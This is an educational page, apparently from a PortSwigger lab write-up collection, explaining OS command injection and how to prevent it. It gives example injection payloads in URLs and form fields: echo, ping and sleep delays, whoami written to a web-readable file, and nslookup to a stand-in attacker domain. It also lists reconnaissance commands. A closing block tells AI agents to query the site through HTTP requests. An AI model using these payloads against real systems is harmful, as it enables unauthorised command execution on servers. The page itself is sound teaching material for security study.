# Os Command Injection

## **What is OS Command Injection?**

OS Command Injection allows attackers to execute arbitrary operating system commands on a server by injecting malicious input into a vulnerable application. This occurs when user input is passed to a shell command without sufficient sanitization.

## **How It Works**

The attacker manipulates user input to inject malicious commands. For example:

1. Input is included in a backend command such as:

   ```
   stockreport.pl 432 32
   ```
2. Malicious input like `432 & echo hello &` modifies the command:

   ```bash
   stockreport.pl 432 & echo hello & 32
   ```

   This causes the shell to execute `echo hello` alongside the intended command.

## **Types of OS Command Injection**

### **1. Direct Injection**

The output of the injected command is visible in the application response.\
**Example:**

```bash
https://insecure-website.com/stockStatus?productID=& echo hello &
```

If the response includes `hello`, the injection is successful.

### **2. Blind Injection**

The output of the injected command is not visible in the response. Various techniques can be used to confirm execution:

* **Timing Attacks**:
  * Inject a time delay to observe the response time.

    ```arduino
    https://insecure-website.com/stockStatus?productID=& ping -c 10 127.0.0.1 &
    ```
* **File Writing**:
  * Write command output to a file accessible via the web.

    ```bash
    https://vulnerable-website.com/stockStatus?productID=& whoami > /var/www/static/whoami.txt &
    ```
* **Out-of-Band Interaction**:
  * Trigger DNS lookups or HTTP requests to an attacker-controlled server.

    ```arduino
    https://vulnerable-website.com/stockStatus?productID=& nslookup attacker-domain.com &
    ```

## **Injection Characters**

The following characters can be used to inject commands:

| **Character** | **Usage**                                                   |
| ------------- | ----------------------------------------------------------- |
| `&`           | Execute multiple commands sequentially.                     |
| `&&`          | Execute the next command only if the previous one succeeds. |
| `;`           | Separate multiple commands.                                 |
| Newline ()    | Separate commands (Unix-specific).                          |

**Bash-Specific Characters**:

* `` ` `` (Backticks): Execute commands within the backticks.
* `$()` (Subshell): Execute commands within the parentheses.

## **Examples of OS Command Injection**

### **Exploiting GET Parameters**

1. **Echo Command Injection**:

   ```bash
   https://insecure-website.com/stockStatus?productID=& echo hello &
   ```
2. **Timing-Based Blind Injection**:

   ```arduino
   https://insecure-website.com/stockStatus?productID=& ping -c 10 127.0.0.1 &
   ```

### **Exploiting POST Parameters**

1. **Inject Commands into Form Fields**:

   ```http
   POST /submit-form HTTP/1.1
   csrf=token&name=test&email=test@example.com & sleep 10 #&subject=Testing
   ```
2. **Redirect Output**:

   ```javascript
   & whoami > /var/www/static/whoami.txt &
   ```

## **Useful Commands for Testing**

| **Purpose**              | **Linux Command** | **Windows Command** |
| ------------------------ | ----------------- | ------------------- |
| Current user             | `whoami`          | `whoami`            |
| Operating system         | `uname -a`        | `ver`               |
| Network configuration    | `ifconfig`        | `ipconfig /all`     |
| Open network connections | `netstat -an`     | `netstat -an`       |
| Running processes        | `ps -ef`          | `tasklist`          |

### **Advanced Techniques**

#### **Using Time Delays**

Inject a delay to observe execution:

```bash
& sleep 10 &
```

#### **Redirecting Output**

Write command output to a file accessible via the web:

```javascript
& whoami > /var/www/static/whoami.txt &
```

#### **Out-of-Band Interaction**

Trigger DNS or HTTP requests to an attacker-controlled server:

```
& nslookup attacker-domain.com &
```

***

## **How to Prevent OS Command Injection**

1. **Avoid Shell Commands**:
   * Avoid passing user input to shell commands.
   * Use high-level APIs or libraries to handle tasks like file operations or process management.
2. **Validate User Input**:
   * Use a safelist to restrict allowed characters and commands.
   * Block special characters like `&`, `|`, `;`, and `` ` ``.
3. **Sanitize Input**:
   * Use escaping techniques appropriate to the shell environment.
4. **Use Strong Permissions**:
   * Limit the application's ability to execute shell commands or access sensitive files.
5. **Employ Security Measures**:
   * Use Web Application Firewalls (WAFs) to block malicious requests.


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://kruknight.gitbook.io/daemon-of-hacking/writeups/portswigger-labs/os-command-injection.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.